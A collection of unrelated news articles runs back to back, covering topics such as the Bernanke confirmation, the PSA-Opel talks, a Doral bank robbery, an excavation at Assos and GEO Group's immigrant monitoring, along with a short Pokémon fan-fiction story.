“ Having said that , ” she says , “ we do n't have a deal yet . ”
LOCAL BEYOND LINEAR : A VIEWER 'S GUIDE
TV stations still ca n't send their full live signals OTT , but they are pushing out their local video content across a range of new platforms . Here are some of the places viewers can watch local TV in non-traditional ways :
STATION-RUN WEBSITES AND APPS : Most stations deliver their own content via the web and mobile apps , streaming live newscasts and offering many segments on-demand .
THIRD-PARTY APPS : Aggregators such as NewsOn and Watchup air local news , live and on-demand , from stations around the country .
BROADCAST NETWORK APPS : Pay-TV subscribers get access to live local TV through Big Four network apps . CBS ' $ 5.99-a-month subscription service , All Access , provides linear streams as well .
DIGITAL DISTRIBUTION PLATFORMS : TV stations are rolling out their own Roku channels . CBS affiliates are launching on PlayStation Vue .
SOCIAL PLATFORMS : Affiliates are using Facebook Live , Periscope and Google Hangouts to supplement their main on-air offerings .
When Wall Street nearly collapsed View photos Would panic prevail ? That was the question gripping the world in the days surrounding the fall of Lehman Brothers on Sept. 15 , 2008 . One year after that terrifying Monday , the people who struggled to cope with the financial crisis share what they were thinking as chaos broke out . Quick Vote Should Ben Bernanke be confirmed for a second term as Fed chair ? Yes
No or View results
NEW YORK ( CNNMoney.com ) -- On the eve of what 's expected to be a tough confirmation hearing Thursday , one senator has thrown up a political roadblock intended to stymie Federal Reserve Chairman Ben Bernanke 's second term .
Sen. Bernie Sanders , I-Vt. , said late Wednesday that he will put a hold on Bernanke 's nomination . A hold is an informal practice in which a senator informs the majority leader that he does not want a measure or nomination to reach the floor for a vote .
`` The American people overwhelmingly voted last year for a change in our national priorities to put the interest of ordinary people ahead of the greed of Wall Street and the wealthy few , '' said Sanders , one of Bernanke 's sharpest critics , in a statement . `` What American people did not bargain for was another four years for one of the key architects of the Bush economy . ''
Sanders said Bernanke , who took the helm of the Fed in 2006 , could have averted the financial crisis in several ways , but failed at `` core responsibility of the Federal Reserve '' and thus `` it 's time for him to go . ''
Among the litany of reasons he cited for his move , the statement from Sanders ' office noted that unemployment had more than doubled under Bernanke 's watch and more than 120 banks have failed since he became chairman .
Bernanke 's first term expires next month .
Majority leader Sen. Harry Reid , D-Nev. , would not need to recognize Sanders ' hold , but Sanders could filibuster the motion to nominate the Fed chairman for another 4-year term .
A spokesman for Reid would not comment on the hold by Sanders .
The Senate Banking Committee is set to hold a hearing on Bernanke 's nomination on Thursday morning .
The First and deputy First Ministers have announced the Executive is providing a £7million rescue package to help the struggling City of Derry Airport .
Stormont has intervened with a rescue package after Ryanair announced it was cutting its London flights as well as reducing flights to Liverpool .
The troubled airport , owned by Derry City and Strabane District Council , is currently operating at a loss of over £2million a year .
The Northern Ireland Executive financial package includes £2.5m for route development and £4.5m capital investment aimed at creating high-value jobs and training opportunities .
First Minister Arlene Foster said : “ This £7m package ensures the airport remains a key gateway to the North West for business and leisure travel .
“ The Council also has plans for further development which would bring employment opportunities to the area and we want to act as a catalyst for it to succeed .
“ This announcement is part of our plan to help deliver economic prosperity in every part of Northern Ireland . Indeed , the plans to invest in capital works will be a welcome boost to the construction sector in the North-West as well .
Image copyright Vauxhall Image caption Vauxhall 's Ellesmere Port factory employs 1,700 people and produces the Astra
France 's PSA Group , maker of Peugeot and Citroen cars , is in talks about taking over General Motors ' ( GM ) loss-making European business Opel .
PSA , which already works with GM in Europe on several projects , said a takeover was among `` numerous strategic initiatives '' being considered .
Any deal would involve Opel 's UK arm Vauxhall , which employs 4,500 staff at plants at Ellesmere Port and Luton .
Unite union leader Len McCluskey said he wanted urgent talks with GM .
`` My priority now is to speak to General Motors to seek immediate assurances for the UK plants and this loyal workforce .
`` I 'll also be seeking urgent conversations with the government , because everything must be done to secure our world-class automotive industry , '' he said .
In addition to the employees at Vauxhall 's manufacturing sites , the company said that 23,000 people worked in the retail network and 7,000 in its UK supply chain .
An Opel takeover would see GM exit UK and Europe , while transforming PSA Group into Europe 's second-largest carmaker - behind VW - with a 16 % share of the European market . Renault-Nissan is currently Europe 's second biggest carmaker .
The French state holds a 14 % stake in PSA , as do the Peugeot family and Chinese firm Dongfeng Motor .
'Potential acquisition '
`` PSA confirms that it is exploring a number of strategic initiatives with GM with the aim of increasing its profitability and operating efficiency , including a potential acquisition of Opel , '' said spokesman Bertrand Blaise .
However , the company added `` there can be no assurance that an agreement will be reached '' .
GM also said that `` there can be no assurance that an agreement will be reached '' .
In December 2013 , GM sold its 7 % stake in PSA for £250m , after plans to make cost savings from co-operating on a number of projects were not as successful as envisaged .
That failed experiment led PSA to seek a bailout from the French government and Dongfeng .
In 2009 , after GM 's bankruptcy the US car giant came close to selling German-based Opel , but changed its mind in order to retain a strong presence in Europe .
'Really disappointed '
The PSA announcement comes a week after GM reported a loss of $ 257m from its European operations last year .
That was the 16th consecutive loss-making year for GM in Europe , bringing its cumulated losses on the continent since 2000 to more than $ 15bn .
Mr McCluskey said he was `` really disappointed '' with how the news of the talks emerged after the GM president gave him personal assurances at the end of last year that there would be no surprises when it came to the future of the UK plants .
He told the PA news agency : `` While this has come out of the blue , we are absolutely determined - UK plants will not be allowed to close .
`` I have no intention of allowing GM to walk away from our plants and workers - so my message to the workers at Luton , Ellesmere Port and the tens of thousands in the wider supply chain is this , remain strong and stay united .
`` The UK and the EU are among GM 's biggest markets - if they think that they can walk away from dedicated workers and loyal consumers without a care , they need to think again . ''
DORAL ( CBSMiami ) — Police have made an arrest after a bank robbery in Doral that involved bomb squad units and an area evacuation .
“ He was really strange , the face of his . Yeah , it was not a good face , ” said Dwight Rodriguez , who told CBS4 's Peter D'Oench he wo n't forget the face of the suspected thief .
Terry Meach was taken into police custody on Thursday following the robbery at a Chase Bank at 9785 N.W . 41st Street .
Rodriguez spoke to Meach moments before he entered the bank .
“ I saw him this morning . He came to me and he wanted a cigarette . I told him I do n't have a cigarette , ” Rodriguez recalled .
Police said Meach entered the bank just as it opened at 9 a.m .
“ A call came in through Chase security and dispatch that a man in a green t-shirt , khaki pants and wearing a black ski cap had a package with him , and hands in his pockets , and was making threats , ” said Capt . Pablo Rodriguez of the Doral Police Dept .
Meach claimed he had links to ISIS .
“ We learned from the bank that he was the first customer in the bank today and he was demanding $ 60,000 in cash or he would blow the place up , ” Capt . Rodriguez said .
Officials said Meach fled after being given an undetermined amount of money . He was spotted by an officer and was chased a block away where he was arrested at N.W . 97th Avenue and 41st Street .
“ He threw all the money up in the air . The money was recovered . The gentleman was taken into custody . There was no indication that there were any ties to ISIS . But he did claim he left a package with a bomb , ” Capt . Rodriguez said .
Businesses along N.W . 41st Street were evacuated as the Miami-Dade Police bomb squad was called in .
“ They did a wonderful job making sure there was nothing flammable , ” said Capt . Rodriguez , after units determined there was no threat . “ Apparently it was two cans of beer . ”
Meach has been arrested before .
“ This gentleman has been involved with two prior bank robberies and he has no links to ISIS , ” Capt . Rodriguez said .
The FBI said Meach may have also been captured on camera Tuesday robbing a SunTrust Bank on Federal Highway in Ft. Lauderdale .
Doral Police said they responded quickly because no one wanted to take any chances .
“ It surprised me because this is Doral and this sort of thing does n't usually happen , ” said Dwight Rodriguez .
Ancient inn complex unearthed in Assos
ÇANAKKALE – Anadolu Agency
Çanakkale Onsekiz Mart University Archaeology Department Professor Nurettin Arslan said works this year mostly focused on Byzantine era ruins in the inner parts of the ancient city .
“ In these excavations , we unearthed the ruins of a complex that could be considered an inn complex . The existence of this complex is mentioned in ancient sources but it has never been unearthed . The inn , where people were accommodated and patients were treated , is located behind the western gate , ” said Arslan , who has been head of the excavations for 10 years .
“ The complex has its own bakery , kitchen and cisterns . All the needs of visitors were met there . At the same time , there is a chapel for people to pray . Ancient resources from the Byzantine era provide information about the inn but none of them defined this structure and its location , ” he added .
“ If we are not wrong , thanks to the artifacts we have found we will be able to shed light on this structure : how it was operated , how many sections it had , and how they served . For example , finding more than one marble table in a room would , should us that people dined there . Finding a small chapel would show that people were able to worship in the inn . There is more than one cistern and water well , as well as kitchens .
There are also many accommodation places connected to each other but no archaeological excavation has been able to locate such a structure . That is why we are sure we have unearthed a Byzantine-era structure , ” Arslan said .
Revealing life at the time
He also said they unearthed residences that had collapsed during an earthquake that occurred in the Byzantine era in the lower agora section .
“ This was probably a big residential complex where one of the notable Byzantine families lived . It collapsed in an earthquake and is an important find to reveal life in the era . As it collapsed in an earthquake , everything is in its own place . This gives us information about the materials used in the Byzantine structures and people 's lifestyles . It helps us reveal what people used in their homes , ” said Arslan .
“ It needs some simple repairs . In particular , the late ancient era structures should be restored . We will do this as soon as possible . We have two big projects . One is an ancient city reception center , which will pass from the Cultural and Natural Heritage Conservation Board and for which we have received ministry approval .
The other project is to unearth the main roads so that visitors can easily visit the site . The theater in the ancient city is one of the most beautiful theaters in Anatolia . Its restoration will start , after which the theater will be a unique place to organize social events in the region , ” he added .
Aristoteles lived here
“ All ancient sources inform that Aristotle lived here from 347 to 345 BC . He had six students here too and we know that he gave classes . This year has been declared the Year of Aristotle , and we have applied to UNESCO to include Assos in the UNESCO tentative world heritage list . Assos is mentioned in the Bible , so it is already well known . If it is also included in the UNESCO list , the number of visitors will increase . Tourism has been going through hard times in Turkey but we are making the environmental arrangements and restorations to host more people , ” Arslan said .
Archaeological excavations in the ancient city of Assos , located in the northwestern Turkish province of Çanakkale 's Ayvacık district , have unearthed an inn complex .
Rep. Will Hurd ( R-Texas ) , a member of the House Intelligence Committee and former CIA agent , said Sunday that he thinks it 's time for President Donald Trump to apologize for the false claims he made about wiretapping .
“ To quote my 85-year-old father , Bob Hurd , who has given this advice to all of my friends when they got married , it never hurts to say you 're sorry , ” Hurd said on ABC 's “ This Week , ” echoing a similar comment he made to CNN on Friday .
Hurd is the second Republican to say Trump ― a man loath to admit any errors ― should apologize to former President Barack Obama over his unsubstantiated claim he tapped the phones in Trump Tower . Rep. Tom Cole ( R-Okla. ) said the same on Friday .
Republicans have struggled to defend Trump after he insisted repeatedly that Obama wiretapped him during the campaign , which he later amended to claiming general surveillance . Trump has produced no evidence that this is true , either to the public or to Congress , according to members .
It 's not just Obama who deserves an apology , but also United Kingdom officials , Hurd said . They were dragged into the controversy when White House press secretary Sean Spicer , seeking to back up Trump 's remarks , quoted a Fox News analyst 's claim that their intelligence agency assisted in Obama 's surveillance effort . The U.K. denied this .
“ We 've got to make sure that we 're all working together , ” Hurd said . “ We live in a dangerous world and we ca n't do this alone . ... It 's not just sorry to the president , but also to the U.K. for the claims or intimation that the U.K. was involved in this as well , ” he said . “ It does n't hurt . ”
Sen. Susan Collins ( R-Maine ) said Sunday on NBC 's “ Meet the Press ” that she wants Trump to explain his comments before she will say whether she thinks he should apologize to Obama .
“ I 'd like to first get to the bottom of this before saying what should be done , ” Collins said . “ I do n't know of the basis for President Trump 's assertion and that 's what I wish he would explain to us on the Intelligence Committee and to the American people . I do believe he owes us that explanation . ”
It does n't appear likely that Trump will take the advice of Hurd and Cole anytime soon . He spent years accusing Obama of faking his U.S. citizenship and has never publicly said he was sorry for doing so , although he finally said last year he thinks the former president is a citizen after all .
His administration 's efforts to smooth over the tension with the United Kingdom were spotty . British Prime Minister Theresa May 's official spokesman said last week that White House officials assured them they would not repeat the claim , and several news outlets reported that Spicer and national security adviser H.R . McMaster apologized .
But publicly , White House officials and the president himself have not expressed regret ― instead , they 've said they were simply quoting the Fox News commentator , Andrew Napolitano , a former New Jersey judge .
Trump insisted on Friday that he and his top aides “ said nothing . ”
“ All we did was quote a certain very talented legal mind who was the one responsible for saying that on television . I did n't make an opinion on it . ... You should n't be talking to me . You should be talking to Fox . ”
“ I do n't think we regret anything , ” Spicer told reporters on Friday . “ As the president said , I was just reading off media reports . ”
Afterward , people did talk to Fox News , which said in a statement that Napolitano stood by his comments . Again , with no evidence .
Fox News anchor Shep Smith said they could n't find any .
After a long summer of topless championship parades , free-agency meetings in the Hamptons , Snapchat mishaps , and gold medals , the NBA is finally , truly , really , almost back . The start of training camp marks the beginning of our NBA Preview .
This is How Basketball Works Week . We 'll be looking at the scouts , stats , coaches , and tactical developments that are shaping the game .
Mike D'Antoni made it official during training camp : James Harden is now the point guard of the Houston Rockets . On some level , it 's just semantics . Harden had one of the highest usage rates in the NBA last season , and he 's going to have the ball in his hands for most of the team 's possessions , regardless of the position he plays . The distinction matters , but it matters more for the players alongside him than for Harden himself .
The Rockets have been trying to find a backcourt partner for Harden ever since he arrived in Houston in 2012 . He 's Mel Gibson in Lethal Weapon ; it 's hard to find a good fit . A guard who plays next to Harden ideally should have the size and athleticism to defend both backcourt positions , so that he can take the tougher assignment on a nightly basis . He should have the shooting ability to be a threat off the ball , knocking down open 3s and opening up the lane . And he should be able to attack a closeout and create a shot for himself and his teammates , so that the Rockets offense wo n't be too one-dimensional .
The guards that the team has tried in that role have fallen short in one category or another :
It 's hard to find the right balance . Jeremy Lin and Ty Lawson are used to playing with the ball , and they do n't offer much value off it . Jason Terry is an elite shooter and Patrick Beverley is an elite defender , but neither is dangerous enough with the ball to threaten defenses . There are n't many 3-and-D point guards in the NBA , and the ones that do exist generally do n't have the size to slide over and handle shooting guards .
In nominally changing Harden 's position on the floor , D'Antoni is cutting out the middleman . It 's been almost impossible to find a point guard to play next to Harden because he was already the Rockets ' de-facto point guard . The most interesting thing about playing him at the point is that it allows the team to pair him with a traditional shooting guard , which would put a whole new twist on the search for his running mate .
The Rockets can add more size to their backcourt , which comes with a few immediate benefits . At 6-foot-5 and 220 pounds with a near 6-foot-11 wingspan , Harden is now one of the biggest point guards in the NBA . The easiest way to play good defense is to have more size and speed than your opponent , and playing Harden next to a wing would give the Rockets one of the biggest backcourts in the league . Beverley is a bulldog defensively , but he is only 6-foot-1 . He 's not going to overwhelm anyone with his athleticism , and he ca n't take advantage of the way Harden 's presence distorts a defense . If the opposing team shifts its starting shooting guard or small forward onto Harden , it forces its point guard to defend a much bigger Rockets perimeter player on the cross-switch . For as much as Beverley makes his opponent work on offense , his lack of offensive versatility allows that opponent to take the night off on defense .
Related Read All Stories From How Basketball Works Week
Beverley is still slated to start next to Harden for the moment , but it 's hard to see him keeping the spot long-term under D'Antoni . The Rockets gave Eric Gordon a four-year , $ 53 million contract in the offseason , and playing him and Harden together would supercharge the offense . Gordon is an explosive scorer and a pure shooter who has scored 16.6 points per game and shot 38.3 percent from 3 on nearly five attempts per game over the course of his career . He can force defenses to chase him off screens , and he can take advantage of weaker defenders one-on-one . Gordon can knock down open 3s from Harden and create open 3s for Harden . The two should fit together like hand and glove on offense .
Gordon has not been a good defensive player since he began dealing with a series of knee injuries that robbed him of some of his explosiveness , but the potential of pairing him with Harden might be too much for D'Antoni to resist . He 's not a coach who is going to leave a lot of points on the board in terms of roster construction , and he has never been afraid of playing unconventional lineups . The beauty of D'Antoni 's system is the way it streamlines everyone 's responsibilities and allows him to put as much speed and shooting on the floor as possible , regardless of position .
The building blocks of the spread pick-and-roll ( which D'Antoni installed in Phoenix in 2004 and which almost every team in the NBA runs these days ) are the ball handler , the roll man , and the shooters . It was revolutionary at the time because he moved Shawn Marion from the 3 to the 4 and Amar ' e Stoudemire from the 4 to the 5 , effectively eliminating the power forward position from his lineup . Either a big man had the shot-blocking and athleticism to be a center , or he had the ballhandling and shooting ability to be a second small forward . There was no place for guys who ca n't do either . The math is just not there to support running set plays to create a post-up or an 18-foot jumper when D'Antoni 's streamlined attack was consistently creating open 3s and dunks , the two most efficient plays in basketball . D'Antoni was running Moreyball when Daryl Morey was a senior vice president in Boston and Harden was a high schooler in Southern California .
The league has caught up to D'Antoni and Morey , and now they need to find a new trick to survive . Can D'Antoni do to the traditional point guard what he did to the traditional power forward ? The Rockets are n't the only team trying to go without one . The Bucks are trying something similar with Giannis Antetokounmpo as the primary ball handler . Is Markelle Fultz , the early front-runner to be the no . 1 overall pick in 2017 , a point guard with the size of a wing or a wing with the game of a point guard ? D'Angelo Russell and Emmanuel Mudiay , the first two point guards taken in the 2015 draft , are 6-foot-5 . Kris Dunn , the first point guard taken in 2016 , is 6-foot-4 . All three might be most effective on the court flanked by 3-and-D wings , which does n't leave much room for the traditional 6-foot-1 floor general .
If the Rockets have learned anything from the past four seasons , it 's that a player like that has little value next to Harden . It was the same story for Kobe Bryant and Dwyane Wade , both of whom thrived playing with more complementary guards like Derek Fisher and Mario Chalmers . The roles in the backcourt were inverted . Fisher and Chalmers , two players who fit the physical profile of a typical point guard , spotted up off the ball like shooting guards . A longer and more athletic player could have taken their spot in the lineup without changing the dynamic on offense . Back then , size dictated position , not skill set . Things are changing fast . If Kobe and Wade were 18-year-olds today , talent evaluators would probably consider them point guards . The modern NBA is a point guard 's league , but the definition of the position is changing . And James Harden might just be its new face .
As Asylum Seekers Swap Prison Beds For Ankle Bracelets , Same Firm Profits
Enlarge this image toggle caption Eric Gay/AP Eric Gay/AP
U.S. Immigration and Customs Enforcement has been under fire for opening three detention centers to hold Central American immigrant families who fled to this country seeking asylum .
Under the pressure of a federal court order , ICE is now exploring ways to release the mothers and children with alternatives to detention — but human rights activists are unhappy that the same for-profit prison company that locked up the families now manages their cases after release .
A dozen young Central American mothers in jeans and sneakers wait in a corner of the Greyhound station in downtown San Antonio . Each of them has a chunky , black , blinking device about the size of an olive jar strapped to her ankle : an electronic monitor .
Enlarge this image toggle caption Eric Gay/AP Eric Gay/AP
The women ca n't take off the devices — even to shower , they have to keep them charged , and they have to check in regularly with compliance officers . If they break any of these rules , they 're in trouble .
`` It makes me ashamed , because they only put them on criminals , and I 'm not a criminal yet , '' says Carolina Menjivar , a 28-year-old Honduran who 's waiting for a bus with her two sons . She was fitted with an ankle monitor when she was released from detention five hours earlier .
`` It 's also uncomfortable , '' she says . `` I do n't even know if I can pull my pants on over this thing . ''
These immigrant women — with their fussy kids eating french fries — have no idea that their odyssey through the American asylum process is making tens of millions of dollars in profits for a company listed on the New York Stock Exchange .
The GEO Group calls itself `` the world leader in private correctional , detention management , and community residential re-entry services , '' and ICE is one of its major customers .
The company holds immigrants at 15 ICE detention centers in six states ; the facility in Karnes County , Texas , was opened especially for Central American moms and their kids . The annual contract is worth $ 26 million . GEO declined to comment for this report , referring all inquiries to Immigration and Customs Enforcement .
ICE calls such facilities `` family residential centers '' ; lawyers and human rights advocates call them family prisons . A California federal judge agreed , ruling in August that such centers are not licensed to hold children , and ordering ICE to release the families `` without unnecessary delay '' from the Karnes County detention center and two other sites .
ICE had already been exploring alternatives to confinement for more than a decade , says Andrew Lorenzen-Strait , ICE deputy assistant director for enforcement and removal operations .
`` We want to examine further ways in light of ongoing litigation that we can ensure compliance that can include , obviously , the use of our family residential centers , but also through alternatives to detention programs such as electronic monitoring and our new case management program , '' he says .
The federal court order and ICE 's compliance efforts led to a windfall for GEO 's nonprison subsidiary , GEO Care .
Last year , GEO Care earned $ 330 million — about a fifth of the corporation 's $ 1.7 billion in revenue . This year , the government will pay GEO $ 56 million to manage ankle monitors for 10,000 immigrants , and to run telephone check-ins for 20,000 immigrants . The idea is to keep track of released detainees to make sure they show up for ICE check-ins and court appearances .
And there 's more : In September , ICE selected GEO Care to administer a first-of-its-kind pilot project , worth $ 11 million , to do case management for released immigrants .
For watchdog groups , all this raises the question of whether there is a conflict of interest for a prison company that now provides social services .
`` Every time there has been an expansion of a different part of the detention system , whether it 's actual detention or alternatives to detention , GEO has been right there ready to take advantage of it , '' says Mary Small , policy director at Detention Watch Network .
Human rights activists like Jonathan Ryan complain that ICE 's continued reliance on GEO criminalizes the presence of asylum applicants on U.S. soil .
`` It 's an ankle monitor here , it 's time in detention there , it 's a for-profit prison case manager who 's now going to follow you on your day-to-day life , '' says Ryan , director of RAICES , a nonprofit in San Antonio that helps unauthorized immigrants . `` It 's a continuous , pervasive pressure that is being put on these women , constantly reminding them that they are not welcome here . ''
Yet these are alternatives to detention . Is n't that what ICE critics have been asking for all along ?
Enlarge this image toggle caption John Burnett/NPR John Burnett/NPR
Lorenzen-Strait says ICE is proud that it has released nearly 3,000 women from confinement since July and given them ankle monitors .
`` Each and every day we do lots of releases from detention into the community , '' the ICE official says . `` And each and every day we take people off of electronic monitoring and place them onto normal orders of supervision . ''
Fresvinda Ponce , a 41-year-old mother from Camayagua , Honduras , does n't know when she 'll get her ankle monitor off . She 's living at a women 's shelter in downtown Houston with her two teenage daughters while she awaits resolution of her asylum request .
`` Sure , it 's better to have an ankle monitor , '' she replies when asked about her release from the family confinement center . `` I was desperate when we were detained . Every day my girls would come home from school and go into the room and cry . 'When can we leave this place ? ' they asked . It impacted all of us . ''
She reaches down and pulls up her white slacks to reveal the bulky black device strapped to her ankle , above her sandaled foot .
`` Right now I feel free , but at the same time I think that I 'm still not free , '' Ponce continues . `` As long as I wear this shackle , I 'm not happy . I feel like I 'm still a prisoner . ''
GEO 's involvement does n't end with the electronic monitoring . It 's the latest contract the company won that was the biggest surprise to immigrant advocates .
Earlier this year , ICE sent out a request for proposals to oversee the case managers working with 1,500 immigrant families in five select cities — just what immigrant defenders have been clamoring for .
The work will involve things like explaining immigrants ' legal rights and the asylum process , and helping enroll their kids in school . The role traditionally has been filled by groups like Catholic Charities and Lutheran Immigration and Refugee Service .
The contract went to GEO Care . ICE insists that the face of the program will continue to be community-based groups like Catholic Charities , but that did n't appease the critics .
Around the Nation Community Groups Help Immigrants Settle Amid Political , Legal Turmoil Community Groups Help Immigrants Settle Amid Political , Legal Turmoil Listen · 4:36 4:36
`` We were not very pleased that the contract ended up going to GEO Care , that is affiliated directly with a company that had prison ties , '' says Michelle Brané , director of migrants and justice at the Women 's Refugee Commission .
Adds Mary Small , of Detention Watch Network : `` Truthfully we 're stunned and disappointed that ICE selected such an inappropriate provider . ''
Asked to comment on the fact that ICE keeps picking GEO to oversee more and more immigrant services , ICE assistant director Lorenzen-Strait says , `` I ca n't get into how people might perceive our partners , but I can tell you that we really aim to ensure that there 's a wide variety of different tools that we can use for compliance . ''
As it happens , the manager for GEO 's new Family Case Management Program is a former top official in ICE 's Office of Enforcement and Removal Operations . Skeptics are watching to see if the prison company can change its stripes .
Fire ! Lava ! Fire and Lava ! It 's the Volcano of two features !
And Nina had chased Team Aqua all the way here since her last encounter with Archie in Slateport .
“ Ugh ! This is the absolute worst place in all of Hoenn , ” Nina was complaining as she got off the cable car . “ It 's not that bad up here , ” the Voices remarked to her , “ Now they 're probably up there by the crater . ”
Nina just scoffed as she started up the steps , “ You just think that because you probably ca n't feel it . It 's HOT ! ”
And just as she was speaking of hot , “ Duck ! ” called the Voices ! Nina reacting fast as a fireball goes whizzing above her head . Looking around she noticed a battle unfolding between red-garbed individuals , and more Aqua grunts . “ Wow , looks like somebody else got here first , ” Nina said . “ Good , let 's go check out that platform way out there ! ” the Voices replied .
And so Nina charged on ahead , out onto the glass-bottomed platform floating perilously over the volcano 's crater . The tall tanned man working the machine out there just smiled as he heard Nina approach .
“ The great swell of power that sleeps beneath the Magma… is this really the key to controlling the Super-Ancient Pokémon 's power ? I expected to see you here , you 're that little scamp that got in our way at Slateport , are n't you ? ”
“ Yeah , that would be me , ” Nina said , “ Your guards were a little tied up so I invited myself in . ”
He scowled , “ That would be Maxie . I suppose you have some guts to go chasing after us , though . I figured you were big stuff when I first laid eyes on you , but WHOA ! ”
“ Such a leech . ”
“ Is he talking about you ? ”
“ He 's flirting . ”
“ Punch him in the balls ! ”
Nina shook her head as if to cue the Voices to be quiet , “ Now what 's going on here , you… . You ... ”
“ Archie , ” the man said , “ You can call me Archie , I 'm the leader of Team Aqua . And since you put forth all the effort to chase me here , I can let you in on just what 's going on .
You know that meteorite I got from Professor High-an-Mighty back there ? Well with the right work , we can make this into a nice , valuable trinket . Like… . A mega stone , or a key stone ! And as long as we 're here at Mt . Chimney . ”
And then Archie paused , grinned , and laughed a deep laugh , “ Bwahaha ! Look what I almost did . If I gave away all the secrets , what would be left for our relationship ? ”
“ Creeper~ ” the Voices whispered to Nina , she brushed them away again .
“ Well if that 's all you 're here for , I 'm going to go ahead and be taking that Meteor back ! ” Nina shouted as she grabbed for her Pokeballs .
“ Ha ha , ” Archie laughed again , “ Now that 's the villain I was expecting . ”
“ Villain ! ? ”
“ We got a thing to do here , scamp , and from our point of view you 're getting in our way . And that makes you the villain . I 'm still the leader of Team Aqua , so that means it 's the rope 's end for you and your Pokémon . Now bring it ! ”
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
“ Really ? A Camerupt ? That 's your last Pokémon ? ” Nina asked as Archie sent it out with frustration .
“ What ? ” Archie asked with a mixture of frustration and exasperation , “ There were a bunch of them on the way up here . ”
“ You 're the leader of Team Aqua , yet you 're using that ? ”
“ Hey , just because we 're Team Aqua that does n't mean we have to throw a bunch of Magikarp at you ! Besides , I 'd like to see that Ivysaur of yours beat my fire-type ! ”
“ Oh , ” the Voices chimed in , “ Magikarp would be nice ! ”
“ Yeah , ” Nina said to nobody in particular , “ Magikarp would be nice . All the same , Ivysaur , use Uproar ! ”
And so Ivysaur went charging ahead , knocking the poor Camerupt silly with the Uproar…
Archie just gasped at the display and smiled , “ Well then , you went and did it , did n't you ? ”
“ Pff , not that hard . Try battling some gyms , they 're tougher than you , ” Nina said with an eyeroll .
“ Ah , Gyms . I knew you were the real deal , scamp . Alright then , this time I 'm not gon na hold back on you . You 'll crumble against my Mega Evolution ! ”
And just then , there was a beeping noise .
Nina looked about with a bit of worry , the Voices buzzing about bombs and such . But Archie just looked deflated , “ Um… one second , Scamp . Got ta take a time out here ... ”
And then he turned away and started talking into an earpiece . Something about Mount Pyre , and an Orb… .
And then he turned back , “ Sorry about that , Scamp . Sometimes when you 're an adult things just pop up . I 'm gon na have to put this battle on hold until the next time we meet . But hey , just so you ca n't go running off and leaving me without that battle , you can hold onto this ! ”
Then Archie walked on over and handed a sizable rock off to Nina , “ Consider it a gift that I 'll be back to collect . ”
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
Not long after Archie left , a man in a red coat walked up to Nina . “ He 's gone ? You repelled Archie by yourself ? That 's no small feat . ”
“ It was n't that hard , his Pokémon were pretty bad , ” Nina said , “ And he left on his own . Took some call and left . ”
The man blinked behind his glasses , worry crossing his face , “ And he did n't even take his equipment , or the Meteorite ? ”
Nina shook her head while the Voices began to rant and rave in her head .
“ He 's a bad man ! ”
“ It 's Team Magma ! ”
“ Magma 's bad too ! ”
The man shook his head , “ This is not good… . Very illogical… . Could it be he 's confirmed the whereabouts of the Orbs ? ”
“ I think he mentioned something about that , but who are you ? ” Nina asked , even as the man was clearly getting anxious to leave .
“ Maximilian , ” the man said , “ But my employees call me Maxie . I need to go , it seems Archie has outmaneuvered me again . I need to find a way to get ahead of him ... ”
And with that , he turned and left without a word , leaving Nina alone with the Voices again… .
Maharashtra 's single-window clearances for industrial units and labour management are the best in India , says a survey . ( Reuters )
A study commissioned by the Central government has found that the Gujarat government follows the best practices for acquiring land in India .
The study by the department of industrial policy and promotion ( DIPP ) has also said that the state has the best environmental licencing procedures . In the course of the election campaign , Congress leaders , including Rahul Gandhi , have criticised the Gujarat government for allegedly giving away land for a song to industries .
But the study , prepared by Accenture and hosted on the DIPP website , notes , The model followed by Gujarat Industrial Development Corporation oversees and ensures reduction in complexity across all processes in getting land . And , although , there might be some implementation issues but it is still wholesome and addresses concerns of all the relevant stakeholders .
The study , part of the broader best practices for improving business in the country , has classified , along with Gujarat , others like Maharashtra , Andhra Pradesh and Rajasthan as among the handful of states which have models worth following by other states .
Surprisingly , for finance and tax-related compliances , West Bengal figures in the list for single-point information dissemination along with Karnataka for integrated and comprehensive system for VAT .
The study also praised Andhra Pradesh for land and building related compliances , Maharashtra and Rajasthan for labour law-related compliances , and Bihar for single window clearances . The study comes amid the Doing Business Report 2014 of the World Bank ranking India at the 134th position among 189 economies . The country scored poorly on parameters of protecting investors , getting electricity , getting credit and registering property , among others .
Along with global factors , investors both foreign and domestic have been highlighting the indecisiveness , lack of transparency , poor governance , corruption and lack of ease of starting and conducting business for decline in investments in the country .
Maharashtra best for industrial , labour nods : DIPP
As India struggles to regain investor confidence by easing the way business can be done in the country , it does n't have to import ideas . In one way or the other , many Indian states are setting examples for others to follow .
Maharashtra 's single-window clearances for industrial units and labour management , for instance , were the best in the country while Gujarat excelled on land acquisition and pollution control , says a new study . Jointly done by the Department of Industrial Promotion and Policy and management consultancy Accenture , the study found Karnataka 's integrated and comprehensive indirect tax management system worth emulating .
The study evaluated Indian states ' performance in terms of the ease of doing business according to various criteria . The DIPP report comes amid a gloomy economic scenario and an investment famine .
Last year , the World Bank and the World Economic Forum ranked India poorly in terms of business environment . Problems and restrictions plague businesses throughout their life cycle , making it difficult , expensive and cumbersome to start , grow or exit from a business .
`` There is a clear need to make it easier to do business in India . Improving the business environment is likely to spur growth and generate employment for millions across the country , '' DIPP said in its report , which has taken inputs from various studies conducted by the World Bank , World Economic Forum , Bain-FICCI , CII-KPMG and Planning Commission-Deloitte .
Highlighting Karnataka 's tax management system , the report said online tax payment system has drastically reduced the tax realisation and reconciliation time from T+6 days to T+1 and saved 20 lakh person kilometre a month .
Elaborating on Maharashtra , the report said the single-window clearance system MAITRI issues 31 clearances and approvals required for setting up industries in the state . It acts as a clearing house for all investment-related information -- clearances , incentives , subsidies and even grievances .
While cumbersome labour laws pose a major hindrance for business , Maharashtra 's Labour Management Solution ( LMS ) helps comply with 46 labour laws through online application , renewal and clearances . While the time taken for issuing new licences was 10 days , renewals ( 7 ) , return filing ( 15 ) and issuing no-objection certificate ( 15 ) , each of these is now achieved in half a day . While approvals have been streamlined , the state has doubled the minimum wage of workers to Rs 4,000 per month .
In case of Gujarat , the GIDC and investor facilitation portal ( IFP ) has simplified land acquisition and helped in expediting land allotment to industry by four times from 285 hectares in 2008-09 to 1,564 hectares . The state passes on to the landowners the 10 % differential it gets for land deals , which helps in eliminating chances of future litigations .
